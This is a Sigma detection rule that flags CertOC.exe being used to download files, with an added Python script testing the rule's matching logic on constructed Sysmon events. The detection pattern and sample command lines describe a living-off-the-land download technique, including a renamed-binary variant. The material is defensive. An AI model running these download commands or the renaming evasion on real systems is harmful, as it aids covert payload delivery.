File Download via CertOC.EXE
Detects when a user downloads a file by using CertOC.exe
Sigma rule:
title: File Download via CertOC.EXE
id: 70ad0861-d1fe-491c-a45f-fa48148a300d
related:
    - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
      type: similar
status: test
description: Detects when a user downloads a file by using CertOC.exe
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-16
modified: 2023-10-18
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certoc.exe'
        - OriginalFileName: 'CertOC.exe'
    selection_cli:
        CommandLine|contains|all:
            - '-GetCACAPS'
            - 'http'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
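The rule's matching logic evaluated over constructed process_creation events, as an added example that is not part of the rule page or the SigmaHQ project. Field names follow Sysmon event ID 1 (Image, OriginalFileName, CommandLine); the sample command lines and hosts are constructed, and Sigma's default case-insensitive string matching is assumed.

```python
"""Evaluate the rule's detection logic over constructed process_creation
events. Added example; not code from the Sigma rule page or SigmaHQ."""
# Tokens mirrored from the rule's detection block (Sigma matches case-insensitively).
IMAGE_SUFFIX = "\\certoc.exe"
ORIGINAL_FILE_NAME = "certoc.exe"
CLI_ALL = ("-getcacaps", "http")


def selection_img(event: dict) -> bool:
    """Image|endswith '\\certoc.exe' OR OriginalFileName == 'CertOC.exe'."""
    image = event.get("Image", "").lower()
    ofn = event.get("OriginalFileName", "").lower()
    return image.endswith(IMAGE_SUFFIX) or ofn == ORIGINAL_FILE_NAME


def selection_cli(event: dict) -> bool:
    """CommandLine|contains|all: every listed token must appear."""
    cmd = event.get("CommandLine", "").lower()
    return all(token in cmd for token in CLI_ALL)


def matches(event: dict) -> bool:
    """condition: all of selection* -> both selections must hold."""
    return selection_img(event) and selection_cli(event)


# Constructed Sysmon-style (EID 1) events; not real telemetry.
SAMPLE_EVENTS = [
    # Plain invocation with a URL: alert.
    {"Image": "C:\\Windows\\System32\\certoc.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "certoc.exe -GetCACAPS http://example.invalid/a.txt"},
    # Renamed binary: Image no longer matches, but PE OriginalFileName still does.
    {"Image": "C:\\Users\\Public\\svc.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "svc.exe -GetCACAPS https://example.invalid/b"},
    # No URL in the command line: selection_cli fails, no alert.
    {"Image": "C:\\Windows\\System32\\certoc.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "certoc.exe -GetCACAPS"},
    # Different binary using the same flag text: selection_img fails, no alert.
    {"Image": "C:\\Tools\\other.exe", "OriginalFileName": "other.exe",
     "CommandLine": "other.exe -GetCACAPS http://example.invalid"},
]


def alerts(events=SAMPLE_EVENTS) -> list:
    """Indexes of events the rule would fire on."""
    return [i for i, ev in enumerate(events) if matches(ev)]


if __name__ == "__main__":
    print(alerts())  # [0, 1]
```

The second sample shows why the rule checks OriginalFileName as well as Image: renaming the binary on disk does not change the PE metadata that Sysmon reports.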
Related rules
- AppX Package Installation Attempts Via AppInstaller.EXE
- Arbitrary File Download Via GfxDownloadWrapper.EXE
- Browser Execution In Headless Mode
- Cisco Stage Data
- Command Line Execution with Suspicious URL and AppData Strings